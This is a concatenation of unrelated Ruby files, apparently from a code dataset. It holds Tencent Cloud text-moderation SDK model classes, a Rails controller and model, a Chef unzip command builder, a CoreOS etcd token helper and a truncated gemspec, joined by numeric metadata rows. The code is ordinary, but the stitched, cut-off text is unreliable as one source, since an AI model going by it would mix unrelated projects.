# See the License for the specific language governing permissions and
# limitations under the License.
module TencentCloud
module Tms
module V20200713
# AccountTipoffAccess request parameter structure
class AccountTipoffAccessRequest < TencentCloud::Common::AbstractModel
# @param ReportedAccount: Reported account, up to 128 characters
# @type ReportedAccount: String
# @param ReportedAccountType: Reported account type (1 - phone number, 2 - QQ number, 3 - WeChat ID, 4 - QQ group number, 5 - WeChat openid, 6 - QQ openid, 0 - other)
# @type ReportedAccountType: Integer
# @param EvilType: Malicious category of the reported account (1 - fraud, 2 - harassment, 3 - advertising, 4 - illegal or non-compliant content, 5 - gambling or pyramid schemes, 0 - other)
# @type EvilType: Integer
# @param SenderAccount: Reporter account, up to 128 characters
# @type SenderAccount: String
# @param SenderAccountType: Reporter account type (1 - phone number, 2 - QQ number, 3 - WeChat ID, 4 - QQ group number, 5 - WeChat openid, 6 - QQ openid, 0 - other)
# @type SenderAccountType: Integer
# @param SenderIP: Reporter IP address
# @type SenderIP: String
# @param EvilContent: Malicious content involving the reported account (e.g. text or image links; under 1024 characters)
# @type EvilContent: String
attr_accessor :ReportedAccount, :ReportedAccountType, :EvilType, :SenderAccount, :SenderAccountType, :SenderIP, :EvilContent
def initialize(reportedaccount=nil, reportedaccounttype=nil, eviltype=nil, senderaccount=nil, senderaccounttype=nil, senderip=nil, evilcontent=nil)
@ReportedAccount = reportedaccount
@ReportedAccountType = reportedaccounttype
@EvilType = eviltype
@SenderAccount = senderaccount
@SenderAccountType = senderaccounttype
@SenderIP = senderip
@EvilContent = evilcontent
end
def deserialize(params)
@ReportedAccount = params['ReportedAccount']
@ReportedAccountType = params['ReportedAccountType']
@EvilType = params['EvilType']
@SenderAccount = params['SenderAccount']
@SenderAccountType = params['SenderAccountType']
@SenderIP = params['SenderIP']
@EvilContent = params['EvilContent']
end
end
# AccountTipoffAccess response parameter structure
class AccountTipoffAccessResponse < TencentCloud::Common::AbstractModel
# @param Data: Response data of the tip-off API
# Note: this field may return null, indicating that no valid value was obtained.
# @type Data: :class:`Tencentcloud::Tms.v20200713.models.TipoffResponse`
# @param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting an issue.
# @type RequestId: String
attr_accessor :Data, :RequestId
def initialize(data=nil, requestid=nil)
@Data = data
@RequestId = requestid
end
def deserialize(params)
unless params['Data'].nil?
@Data = TipoffResponse.new
@Data.deserialize(params['Data'])
end
@RequestId = params['RequestId']
end
end
# DescribeTextLib request parameter structure
class DescribeTextLibRequest < TencentCloud::Common::AbstractModel
# @param StrategyType: Content type. text: 1; image: 2; audio: 3; video: 4
# @type StrategyType: Integer
attr_accessor :StrategyType
def initialize(strategytype=nil)
@StrategyType = strategytype
end
def deserialize(params)
@StrategyType = params['StrategyType']
end
end
# DescribeTextLib response parameter structure
class DescribeTextLibResponse < TencentCloud::Common::AbstractModel
# @param TextLib: List of text library ids and names
# @type TextLib: Array
# @param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting an issue.
# @type RequestId: String
attr_accessor :TextLib, :RequestId
def initialize(textlib=nil, requestid=nil)
@TextLib = textlib
@RequestId = requestid
end
def deserialize(params)
unless params['TextLib'].nil?
@TextLib = []
params['TextLib'].each do |i|
textlib_tmp = TextLib.new
textlib_tmp.deserialize(i)
@TextLib << textlib_tmp
end
end
@RequestId = params['RequestId']
end
end
# DescribeTextStat request parameter structure
class DescribeTextStatRequest < TencentCloud::Common::AbstractModel
# @param AuditType: Moderation type. 1: machine moderation; 2: human moderation
# @type AuditType: Integer
# @param Filters: Query conditions
# @type Filters: Array
attr_accessor :AuditType, :Filters
def initialize(audittype=nil, filters=nil)
@AuditType = audittype
@Filters = filters
end
def deserialize(params)
@AuditType = params['AuditType']
unless params['Filters'].nil?
@Filters = []
params['Filters'].each do |i|
filters_tmp = Filters.new
filters_tmp.deserialize(i)
@Filters << filters_tmp
end
end
end
end
# DescribeTextStat response parameter structure
class DescribeTextStatResponse < TencentCloud::Common::AbstractModel
# @param Overview: Statistics of recognition results
# @type Overview: :class:`Tencentcloud::Tms.v20200713.models.Overview`
# @param TrendCount: Statistics of recognition volume
# @type TrendCount: Array
# @param EvilCount: Distribution of violating data
# Note: this field may return null, indicating that no valid value was obtained.
# @type EvilCount: Array
# @param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting an issue.
# @type RequestId: String
attr_accessor :Overview, :TrendCount, :EvilCount, :RequestId
def initialize(overview=nil, trendcount=nil, evilcount=nil, requestid=nil)
@Overview = overview
@TrendCount = trendcount
@EvilCount = evilcount
@RequestId = requestid
end
def deserialize(params)
unless params['Overview'].nil?
@Overview = Overview.new
@Overview.deserialize(params['Overview'])
end
unless params['TrendCount'].nil?
@TrendCount = []
params['TrendCount'].each do |i|
trendcount_tmp = TrendCount.new
trendcount_tmp.deserialize(i)
@TrendCount << trendcount_tmp
end
end
unless params['EvilCount'].nil?
@EvilCount = []
params['EvilCount'].each do |i|
evilcount_tmp = EvilCount.new
evilcount_tmp.deserialize(i)
@EvilCount << evilcount_tmp
end
end
@RequestId = params['RequestId']
end
end
# Detailed results returned for text
class DetailResults < TencentCloud::Common::AbstractModel
# @param Label: Malicious label. Normal: normal, Porn: pornography, Abuse: verbal abuse, Ad: advertising, Custom: custom keyword library,
# as well as offensive, unsafe, or otherwise inappropriate content types.
# @type Label: String
# @param Suggestion: Recommended action to take once you have the result.
# Suggested values. Block: recommend blocking, Review: recommend manual review, Pass: recommend approval
# Note: this field may return null, indicating that no valid value was obtained.
# @type Suggestion: String
# @param Keywords: Keywords hit under this label
# Note: this field may return null, indicating that no valid value was obtained.
# @type Keywords: Array
# @param Score: Score of the model hit for this label
# Note: this field may return null, indicating that no valid value was obtained.
# @type Score: Integer
# @param LibType: Valid only when Label is Custom (custom keywords); type of the custom keyword library. 1: black/white library, 2: custom library
# Note: this field may return null, indicating that no valid value was obtained.
# @type LibType: Integer
# @param LibId: Valid only when Label is Custom (custom keywords); id of the custom library
# Note: this field may return null, indicating that no valid value was obtained.
# @type LibId: String
# @param LibName: Valid only when Label is Custom (custom keywords); name of the custom library
# Note: this field may return null, indicating that no valid value was obtained.
# @type LibName: String
attr_accessor :Label, :Suggestion, :Keywords, :Score, :LibType, :LibId, :LibName
def initialize(label=nil, suggestion=nil, keywords=nil, score=nil, libtype=nil, libid=nil, libname=nil)
@Label = label
@Suggestion = suggestion
@Keywords = keywords
@Score = score
@LibType = libtype
@LibId = libid
@LibName = libname
end
def deserialize(params)
@Label = params['Label']
@Suggestion = params['Suggestion']
@Keywords = params['Keywords']
@Score = params['Score']
@LibType = params['LibType']
@LibId = params['LibId']
@LibName = params['LibName']
end
end
# Device information
class Device < TencentCloud::Common::AbstractModel
# @param IP: User IP
# @type IP: String
# @param Mac: MAC address
# @type Mac: String
# @param TokenId: Device fingerprint token
# @type TokenId: String
# @param DeviceId: Device fingerprint ID
# @type DeviceId: String
# @param IMEI: Device serial number
# @type IMEI: String
# @param IDFA: For iOS devices, Identifier For Advertising
# @type IDFA: String
# @param IDFV: For iOS devices, IDFV - Identifier For Vendor
# @type IDFV: String
attr_accessor :IP, :Mac, :TokenId, :DeviceId, :IMEI, :IDFA, :IDFV
def initialize(ip=nil, mac=nil, tokenid=nil, deviceid=nil, imei=nil, idfa=nil, idfv=nil)
@IP = ip
@Mac = mac
@TokenId = tokenid
@DeviceId = deviceid
@IMEI = imei
@IDFA = idfa
@IDFV = idfv
end
def deserialize(params)
@IP = params['IP']
@Mac = params['Mac']
@TokenId = params['TokenId']
@DeviceId = params['DeviceId']
@IMEI = params['IMEI']
@IDFA = params['IDFA']
@IDFV = params['IDFV']
end
end
# Distribution of violating data
class EvilCount < TencentCloud::Common::AbstractModel
# @param EvilType: ---- Optional; this parameter's functionality is not yet publicly available
# @type EvilType: String
# @param Count: Total count for this distribution type
# @type Count: Integer
attr_accessor :EvilType, :Count
def initialize(eviltype=nil, count=nil)
@EvilType = eviltype
@Count = count
end
def deserialize(params)
@EvilType = params['EvilType']
@Count = params['Count']
end
end
# Text filter conditions
class Filters < TencentCloud::Common::AbstractModel
# @param Name: Query field:
# strategy: BizType
# sub-account: SubUin
# date range: DateRange
# @type Name: String
# @param Values: Query values
# @type Values: Array
attr_accessor :Name, :Values
def initialize(name=nil, values=nil)
@Name = name
@Values = values
end
def deserialize(params)
@Name = params['Name']
@Values = params['Values']
end
end
# Statistics of recognition results
class Overview < TencentCloud::Common::AbstractModel
# @param TotalCount: Total number of calls
# @type TotalCount: Integer
# @param TotalHour: Total call duration
# @type TotalHour: Integer
# @param PassCount: Number passed
# @type PassCount: Integer
# @param PassHour: Passed duration
# @type PassHour: Integer
# @param EvilCount: Number of violations
# @type EvilCount: Integer
# @param EvilHour: Violation duration
# @type EvilHour: Integer
# @param SuspectCount: Number of suspected violations
# @type SuspectCount: Integer
# @param SuspectHour: Suspected violation duration
# @type SuspectHour: Integer
attr_accessor :TotalCount, :TotalHour, :PassCount, :PassHour, :EvilCount, :EvilHour, :SuspectCount, :SuspectHour
def initialize(totalcount=nil, totalhour=nil, passcount=nil, passhour=nil, evilcount=nil, evilhour=nil, suspectcount=nil, suspecthour=nil)
@TotalCount = totalcount
@TotalHour = totalhour
@PassCount = passcount
@PassHour = passhour
@EvilCount = evilcount
@EvilHour = evilhour
@SuspectCount = suspectcount
@SuspectHour = suspecthour
end
def deserialize(params)
@TotalCount = params['TotalCount']
@TotalHour = params['TotalHour']
@PassCount = params['PassCount']
@PassHour = params['PassHour']
@EvilCount = params['EvilCount']
@EvilHour = params['EvilHour']
@SuspectCount = params['SuspectCount']
@SuspectHour = params['SuspectHour']
end
end
# Account risk detection results
class RiskDetails < TencentCloud::Common::AbstractModel
# @param Label: Risk category: RiskAccount, RiskIP, RiskIMEI
# @type Label: String
# @param Level: Risk level. 1: suspected, 2: malicious
# @type Level: Integer
attr_accessor :Label, :Level
def initialize(label=nil, level=nil)
@Label = label
@Level = level
end
def deserialize(params)
@Label = params['Label']
@Level = params['Level']
end
end
# List of custom libraries
class TextLib < TencentCloud::Common::AbstractModel
# @param LibId: Library id
# @type LibId: Integer
# @param LibName: Library name
# @type LibName: String
attr_accessor :LibId, :LibName
def initialize(libid=nil, libname=nil)
@LibId = libid
@LibName = libname
end
def deserialize(params)
@LibId = params['LibId']
@LibName = params['LibName']
end
end
# TextModeration request parameter structure
class TextModerationRequest < TencentCloud::Common::AbstractModel
# @param Content: Base64-encoded text content. The original text must not exceed 10000 unicode characters
# @type Content: String
# @param BizType: Identifies the business scenario. You can create an ID in the content moderation console and configure a different moderation policy for each one. Defaults to 0 if omitted, in which case the backend applies the default policy
# @type BizType: String
# @param DataId: Data ID made up of letters, underscores and hyphens, up to 64 characters
# @type DataId: String
# @param User: Account information; if provided, it helps identify accounts at risk of violations
# @type User: :class:`Tencentcloud::Tms.v20200713.models.User`
# @param Device: Device information; if provided, it helps identify devices at risk of violations
# @type Device: :class:`Tencentcloud::Tms.v20200713.models.Device`
attr_accessor :Content, :BizType, :DataId, :User, :Device
def initialize(content=nil, biztype=nil, dataid=nil, user=nil, device=nil)
@Content = content
@BizType = biztype
@DataId = dataid
@User = user
@Device = device
end
def deserialize(params)
@Content = params['Content']
@BizType = params['BizType']
@DataId = params['DataId']
unless params['User'].nil?
@User = User.new
@User.deserialize(params['User'])
end
unless params['Device'].nil?
@Device = Device.new
@Device.deserialize(params['Device'])
end
end
end
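# Illustrative usage (an assumption, not part of this SDK file): `client` is
# a configured Tms V20200713 client created elsewhere with your credentials,
# and the client method name mirrors the API action.
#   req = TextModerationRequest.new(Base64.strict_encode64('text to check'), 'my_biztype')
#   rsp = client.TextModeration(req)
#   puts rsp.Suggestion # e.g. "Pass", "Review" or "Block"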
# TextModeration response parameter structure
class TextModerationResponse < TencentCloud::Common::AbstractModel
# @param BizType: The Biztype parameter you passed in the request
# @type BizType: String
# @param EvilFlag: Whether the data is of a malicious type. 0: normal, 1: suspicious
# @type EvilFlag: Integer
# @param Label: Malicious label. Normal: normal, Porn: pornography, Abuse: verbal abuse, Ad: advertising, Custom: custom keyword library, as well as offensive, unsafe, or otherwise inappropriate content types
# @type Label: String
# @param Suggestion: Recommended action to take once you have the result
# Suggested values. Block: recommend blocking, Review: recommend manual review, Pass: recommend approval
# @type Suggestion: String
# @param Keywords: Keywords hit in the text, indicating the specific reason the text violates policy; multiple hit keywords may be returned (e.g. "add me on WeChat").
# If this is empty while Score is not, the recognition result (Label) comes from the semantic model
# Note: this field may return null, indicating that no valid value was obtained.
# @type Keywords: Array
# @param Score: The machine's confidence in the current category, in the range 0.00-100.00. The higher the score, the more likely the sample belongs to the category.
# (e.g. Porn 99.99 means the sample is pornographic with very high confidence.)
# @type Score: Integer
# @param DetailResults: Detailed results returned after the API recognizes the sample
# Note: this field may return null, indicating that no valid value was obtained.
# @type DetailResults: Array
# @param RiskDetails: Detection results for risky, violating accounts found in the sample
# Note: this field may return null, indicating that no valid value was obtained.
# @type RiskDetails: Array
# @param Extra: Extension field for returning specific information; contents differ per customer/Biztype
# Note: this field may return null, indicating that no valid value was obtained.
# @type Extra: String
# @param DataId: The DataId from the request parameters
# Note: this field may return null, indicating that no valid value was obtained.
# @type DataId: String
# @param RequestId: Unique request ID, returned with every request. Provide this RequestId when troubleshooting an issue.
# @type RequestId: String
attr_accessor :BizType, :EvilFlag, :Label, :Suggestion, :Keywords, :Score, :DetailResults, :RiskDetails, :Extra, :DataId, :RequestId
def initialize(biztype=nil, evilflag=nil, label=nil, suggestion=nil, keywords=nil, score=nil, detailresults=nil, riskdetails=nil, extra=nil, dataid=nil, requestid=nil)
@BizType = biztype
@EvilFlag = evilflag
@Label = label
@Suggestion = suggestion
@Keywords = keywords
@Score = score
@DetailResults = detailresults
@RiskDetails = riskdetails
@Extra = extra
@DataId = dataid
@RequestId = requestid
end
def deserialize(params)
@BizType = params['BizType']
@EvilFlag = params['EvilFlag']
@Label = params['Label']
@Suggestion = params['Suggestion']
@Keywords = params['Keywords']
@Score = params['Score']
unless params['DetailResults'].nil?
@DetailResults = []
params['DetailResults'].each do |i|
detailresults_tmp = DetailResults.new
detailresults_tmp.deserialize(i)
@DetailResults << detailresults_tmp
end
end
unless params['RiskDetails'].nil?
@RiskDetails = []
params['RiskDetails'].each do |i|
riskdetails_tmp = RiskDetails.new
riskdetails_tmp.deserialize(i)
@RiskDetails << riskdetails_tmp
end
end
@Extra = params['Extra']
@DataId = params['DataId']
@RequestId = params['RequestId']
end
end
# Response data of the tip-off API
class TipoffResponse < TencentCloud::Common::AbstractModel
# @param ResultCode: Tip-off result: "0 - tip-off data submitted successfully, 99 - tip-off data submission failed"
# @type ResultCode: Integer
# @param ResultMsg: Result description
# @type ResultMsg: String
attr_accessor :ResultCode, :ResultMsg
def initialize(resultcode=nil, resultmsg=nil)
@ResultCode = resultcode
@ResultMsg = resultmsg
end
def deserialize(params)
@ResultCode = params['ResultCode']
@ResultMsg = params['ResultMsg']
end
end
# Statistics of recognition volume
class TrendCount < TencentCloud::Common::AbstractModel
# @param TotalCount: Total number of calls
# Note: this field may return null, indicating that no valid value was obtained.
# @type TotalCount: Integer
# @param TotalHour: Total call duration
# Note: this field may return null, indicating that no valid value was obtained.
# @type TotalHour: Integer
# @param PassCount: Number passed
# Note: this field may return null, indicating that no valid value was obtained.
# @type PassCount: Integer
# @param PassHour: Passed duration
# Note: this field may return null, indicating that no valid value was obtained.
# @type PassHour: Integer
# @param EvilCount: Number of violations
# Note: this field may return null, indicating that no valid value was obtained.
# @type EvilCount: Integer
# @param EvilHour: Violation duration
# Note: this field may return null, indicating that no valid value was obtained.
# @type EvilHour: Integer
# @param SuspectCount: Number of suspected violations
# Note: this field may return null, indicating that no valid value was obtained.
# @type SuspectCount: Integer
# @param SuspectHour: Suspected violation duration
# Note: this field may return null, indicating that no valid value was obtained.
# @type SuspectHour: Integer
# @param Date: Date
# Note: this field may return null, indicating that no valid value was obtained.
# @type Date: String
attr_accessor :TotalCount, :TotalHour, :PassCount, :PassHour, :EvilCount, :EvilHour, :SuspectCount, :SuspectHour, :Date
def initialize(totalcount=nil, totalhour=nil, passcount=nil, passhour=nil, evilcount=nil, evilhour=nil, suspectcount=nil, suspecthour=nil, date=nil)
@TotalCount = totalcount
@TotalHour = totalhour
@PassCount = passcount
@PassHour = passhour
@EvilCount = evilcount
@EvilHour = evilhour
@SuspectCount = suspectcount
@SuspectHour = suspecthour
@Date = date
end
def deserialize(params)
@TotalCount = params['TotalCount']
@TotalHour = params['TotalHour']
@PassCount = params['PassCount']
@PassHour = params['PassHour']
@EvilCount = params['EvilCount']
@EvilHour = params['EvilHour']
@SuspectCount = params['SuspectCount']
@SuspectHour = params['SuspectHour']
@Date = params['Date']
end
end
# User information
class User < TencentCloud::Common::AbstractModel
# @param UserId: User account ID. If provided, the account's history of malicious behavior is factored into the harmfulness verdict, which is especially useful as supporting evidence in suspicious cases. The account may be a WeChat uin, QQ number, WeChat openid, QQ openid, or another string. Together with the account type, this field identifies a unique account.
# @type UserId: String
# @param Nickname: User nickname
# @type Nickname: String
# @param AccountType: Account type: "1 - WeChat uin, 2 - QQ number, 3 - WeChat group uin, 4 - QQ group number, 5 - WeChat openid, 6 - QQ openid, 7 - other string"
# @type AccountType: Integer
# @param Gender: Gender. Default 0: unknown, 1: male, 2: female
# @type Gender: Integer
# @param Age: Age. Default 0: unknown
# @type Age: Integer
# @param Level: User level. Default 0: unknown, 1: low, 2: medium, 3: high
# @type Level: Integer
# @param Phone: Phone number
# @type Phone: String
attr_accessor :UserId, :Nickname, :AccountType, :Gender, :Age, :Level, :Phone
def initialize(userid=nil, nickname=nil, accounttype=nil, gender=nil, age=nil, level=nil, phone=nil)
@UserId = userid
@Nickname = nickname
@AccountType = accounttype
@Gender = gender
@Age = age
@Level = level
@Phone = phone
end
def deserialize(params)
@UserId = params['UserId']
@Nickname = params['Nickname']
@AccountType = params['AccountType']
@Gender = params['Gender']
@Age = params['Age']
@Level = params['Level']
@Phone = params['Phone']
end
end
end
end
end
| 34.035276 | 175 | 0.585643 |
398e1d2462e76451a4245192e49f3b85727bf229 | 2,767 | class Courses::CourseDetailController < ApplicationController
def index
puts "ec- In CourseDetailController -index"
puts ("#{params[:course_id]}")
@coursedetail = CourseDetail.where(course_id: params[:course_id])
respond_to do |format|
format.html { render :index }
format.json {render json: @coursedetail }
end
end
def edit
puts "ec- In CourseDetailController -edit"
@course_detail = CourseDetail.find(params[:id])
end
def new
@course_detail = CourseDetail.new
end
def at_risk
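# Delegates to the model; note the result is not assigned to an instance
# variable, so the implicitly rendered at_risk view cannot use it directly.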
CourseDetail.at_risk_students
end
#RAILS PROJECT CODE
# def create
# puts "ec- In CourseDetailController -create"
# @course_detail = CourseDetail.new(course_detail_params)
# if @course_detail.save
# flash[:notice] = "Record successfully added."
# redirect_to course_course_details_path("#{params[:course_id]}")
# else
# flash[:error] = "Record not added. Please try again."
# puts "Errors are #{@course_detail.errors.any?}"
# @course_detail.errors.full_messages.each do |msg|
# puts msg
# end
# render :new
#
# end
# end
# JAVASCRIPT / RAILS PROJECT CODE
def create
puts "ec- In CourseDetailController -create"
@course_detail = CourseDetail.new(course_detail_params)
if @course_detail.save
flash[:notice] = "Record successfully added."
# redirect_to course_course_details_path("#{params[:course_id]}")
render json: @course_detail, status: 201
else
#render json: @course_detail, status: 406
flash[:error] = "Record not added. Please try again."
puts "Errors are #{@course_detail.errors.any?}"
@course_detail.errors.full_messages.each do |msg|
puts msg
end
render :new
end
end
def show
puts "ec- In CourseDetailController -show"
@acoursedetail = CourseDetail.where(course_id: params[:id])
respond_to do |format|
format.html { render :index }
format.json {render json: @acoursedetail }
end
end
def update
@course_detail = CourseDetail.find(params[:id])
if @course_detail.update(course_detail_params)
flash[:notice] = "Record successfully updated."
else
flash[:notice] = "Record not updated. Please try again."
end
render :edit
end
def destroy
@course_detail = CourseDetail.find(params[:id])
@course_detail.delete
flash[:notice] = "Record successfully deleted."
redirect_to course_course_details_path(params[:course_id])
end
## PRIVATE METHODS
private
def course_detail_params
params.require(:course_detail).permit(:student_id, :teacher_id, :course_id, :assignment_name, :assignment_grade)
end
end
| 25.154545 | 116 | 0.666064 |
3310a118cfd9447b5ed952ac7c2df3968fdc4f7e | 275 | # frozen_string_literal: true
class BlogEntry < ApplicationRecord
self.table_name = :blog_entries
belongs_to :blog
has_many :images, dependent: :restrict_with_error
validates :blog_id, :title, :text, presence: true
validates :blog, presence: { if: :blog_id }
end
| 25 | 51 | 0.756364 |
1c1f4efe3d5dfd32f4084e4c40b51e41d326fa8e | 1,360 | module Ark
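# Builds the shell command strings used to unpack zip archives.
# Illustrative usage (assuming a resource exposing release_file, path,
# creates and strip_components):
#   Ark::UnzipCommandBuilder.new(resource).unpack # => "unzip -q -o ..."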
class UnzipCommandBuilder
def unpack
if resource.strip_components > 0
unzip_with_strip_components
else
"unzip -q -o #{resource.release_file} -d #{resource.path}"
end
end
def dump
"unzip -j -q -o \"#{resource.release_file}\" -d \"#{resource.path}\""
end
# rubocop:disable Metrics/AbcSize
def cherry_pick
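# `unzip -t` first probes the archive for "*/<creates>"; exit status 11
# means no entry matched, so we fall back to extracting <creates> from the
# archive root instead. Any other non-zero status fails the command.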
cmd = "unzip -t #{resource.release_file} \"*/#{resource.creates}\" ; stat=$? ;"
cmd += "if [ $stat -eq 11 ] ; then "
cmd += "unzip -j -o #{resource.release_file} \"#{resource.creates}\" -d #{resource.path} ;"
cmd += "elif [ $stat -ne 0 ] ; then false ;"
cmd += "else "
cmd += "unzip -j -o #{resource.release_file} \"*/#{resource.creates}\" -d #{resource.path} ;"
cmd += "fi"
cmd
end
# rubocop:enable Metrics/AbcSize
def initialize(resource)
@resource = resource
end
private
attr_reader :resource
def unzip_with_strip_components
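# Emulates tar's --strip-components for zip archives: extract into a temp
# dir, then rsync from N directory levels down ('*/' per stripped level)
# into the final path before removing the temp dir.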
tmpdir = make_temp_directory
strip_dir = '*/' * resource.strip_components
cmd = "unzip -q -o #{resource.release_file} -d #{tmpdir}"
cmd += " && rsync -a #{tmpdir}/#{strip_dir} #{resource.path}"
cmd += " && rm -rf #{tmpdir}"
cmd
end
def make_temp_directory
require 'tmpdir'
Dir.mktmpdir
end
end
end
| 26.666667 | 100 | 0.580147 |
2136b588b00f0ba40bf81e427116a24dedec48c0 | 4,713 | module Fastlane
module Actions
class GetInfoPlistPathAction < Action
require 'xcodeproj'
require 'pathname'
def self.run(params)
unless params[:xcodeproj]
if Helper.test?
params[:xcodeproj] = "/tmp/fastlane/tests/fastlane/bundle.xcodeproj"
else
params[:xcodeproj] = Dir["*.xcodeproj"][0] unless params[:xcodeproj]
end
end
        if params[:target]
path = find_path_using_target(params)
else
path = find_path_using_scheme(params)
end
path
end
def self.find_path_using_target(params)
project = Xcodeproj::Project.open(params[:xcodeproj])
if params[:target]
target = project.targets.detect { |t| t.name == params[:target]}
else
# firstly we are trying to find modern application target
target = project.targets.detect do |t|
t.kind_of?(Xcodeproj::Project::Object::PBXNativeTarget) &&
t.product_type == 'com.apple.product-type.application'
end
target = project.targets[0] if target.nil?
end
if params[:build_configuration_name]
build_settings = target.build_settings(params[:build_configuration_name])
plist = build_settings['INFOPLIST_FILE']
else
begin
plist = target.common_resolved_build_setting('INFOPLIST_FILE')
rescue
UI.user_error! 'Cannot resolve Info.plist build setting. Maybe you should specify :build_configuration_name?'
end
end
path = plist.gsub('$(SRCROOT)', project.path.parent.to_path)
path = path.gsub('${SRCROOT}', project.path.parent.to_path)
unless (Pathname.new path).absolute?
path = File.join(project.path.parent.to_path, path)
end
path
end
def self.find_path_using_scheme(params)
config = {project: params[:xcodeproj], scheme: params[:scheme], configuration: params[:build_configuration_name]}
project = FastlaneCore::Project.new(config)
project.select_scheme
path = project.build_settings(key: 'INFOPLIST_FILE')
unless (Pathname.new path).absolute?
path = File.join(Pathname.new(project.path).parent.to_path, path)
end
path
end
#####################################################
# @!group Documentation
#####################################################
def self.description
"Get the version number of your project"
end
def self.details
[
"This action will return path to Info.plist for specific target in your project."
].join(' ')
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :xcodeproj,
env_name: "FL_INFO_PLIST_PROJECT",
description: "optional, you must specify the path to your main Xcode project if it is not in the project root directory or if you have multiple *.xcodeproj's in the root directory",
optional: true,
verify_block: proc do |value|
UI.user_error!("Please pass the path to the project, not the workspace") if value.end_with? ".xcworkspace"
UI.user_error!("Could not find Xcode project at path '#{File.expand_path(value)}'") if !File.exist?(value) and !Helper.is_test?
end),
FastlaneCore::ConfigItem.new(key: :target,
env_name: "FL_INFO_PLIST_TARGET",
optional: true,
conflicting_options: [:scheme],
description: "Specify a specific target if you have multiple per project, optional"),
FastlaneCore::ConfigItem.new(key: :scheme,
env_name: "FL_INFO_PLIST_SCHEME",
optional: true,
conflicting_options: [:target],
description: "Specify a specific scheme if you have multiple per project, optional"),
FastlaneCore::ConfigItem.new(key: :build_configuration_name,
optional: true,
description: "Specify a specific build configuration if you have different Info.plist build settings for each configuration")
]
end
def self.authors
["SiarheiFedartsou"]
end
def self.is_supported?(platform)
[:ios, :mac].include? platform
end
end
end
end
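
# A minimal Fastfile sketch for this action; the action name is derived from
# the class name, and the project/target values are assumptions:
#
#   lane :plist do
#     path = get_info_plist_path(xcodeproj: "MyApp.xcodeproj", target: "MyApp")
#     UI.message("Info.plist lives at #{path}")
#   end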
| 39.275 | 210 | 0.565457 |
1ac6f9361da97e707d9213833890335ea42434d3 | 534 | class SelectionHandler
attr_accessor :next_selection_handler, :previous_selection_handler
def handle_input
input = gets.downcase
if input.is_a? Integer
#all methods for selecting search parameters will return integers;
#it is up to the methods themselves to discern whether or not the
#input is within range of the size of the lists of parameters
#to choose from
else
#a valid command has not been chosen
puts "Invalid input."
display_commands
handle_input
end
end
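
# A minimal sketch of wiring handlers into the intended chain; the handler
# instances and their roles are assumptions:
#
#   genre_handler = SelectionHandler.new
#   year_handler  = SelectionHandler.new
#   genre_handler.next_selection_handler    = year_handler
#   year_handler.previous_selection_handler = genre_handler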
| 29.666667 | 72 | 0.719101 |
084f56a2b8709a9680b2ceba00baf9a90907f413 | 764 | def staircase(n)
to_return = {}
1.upto n do |crnt_size|
next if crnt_size.even?
all = Array.new(crnt_size) { |i| i + 1 }
evens = all.select { |i| i.even? }
to_return[crnt_size] = evens
end
to_return
end
#================================
#paul fitz & meads
def staircase(n)
  answer = Hash.new
  evens = []
  odds = []
  1.upto(n) do |x| #0 is even
    evens << x if x.even?
    odds << x if x.odd?
  end
  odds.each do |x|
    answer[x] = evens.select { |y| y < x }
  end
  answer # return the hash itself, not the result of odds.each
end
#Sebastien
def staircase(number)
  newHash = Hash.new { |hash, key| hash[key] = [] }
  (1..number).each do |x|
    # only odd keys are ever assigned, so no delete_if pass is needed
    if x.odd?
      newHash[x] = (1..x).to_a.select { |e| e.even? }
    end
  end
  return newHash
end
7a454d292d0e27a32dd090565cad1f3c2da5b92e | 61 | require "sc4ry/version"
require "sc4ry/dependencies"
| 5.545455 | 28 | 0.704918 |
e86c3b591cc496682625192e9e841a257c6e4940 | 1,747 | #
# The MIT License (MIT)
#
# Copyright (c) 2014 Wynand Pieterse
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Version 0.1.0
#
require 'open-uri'
require 'yaml'
# Regenerate the CoreOS cluster token if the system is brought up on Vagrant.
def setUpCoreOSClusterToken
generatedCoreFile = "generated/files/LocalUserData.yml"
baseCoreFile = "configuration/coreos/LocalUserData.yml"
if ARGV[0].eql?('up')
token = open('https://discovery.etcd.io/new').read
data = YAML.load(IO.readlines(baseCoreFile)[1..-1].join)
data['coreos']['etcd']['discovery'] = token
yaml = YAML.dump(data)
File.open(generatedCoreFile, 'w') { |file| file.write("#{yaml}") }
return generatedCoreFile
else
return baseCoreFile
end
end | 35.653061 | 80 | 0.752147 |
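# A minimal Vagrantfile sketch around this helper; the destination is the
# conventional coreos-vagrant path, everything else is an assumption:
#
#   Vagrant.configure('2') do |config|
#     user_data = setUpCoreOSClusterToken
#     config.vm.provision :file, source: user_data,
#                                destination: '/tmp/vagrantfile-user-data'
#   end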
5d846fa29a449b3ccbea3cfb7b75397b346ef824 | 1,622 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'tensor_stream/version'
Gem::Specification.new do |spec|
spec.name = "tensor_stream"
spec.version = TensorStream::VERSION
spec.authors = ["Joseph Emmanuel Dayo"]
spec.email = ["[email protected]"]
spec.summary = %q{High Performance Machine Learning for Ruby}
spec.description = %q{High Performance Machine Learning for Ruby}
spec.homepage = "http://www.github.com/jedld/tensor_stream"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
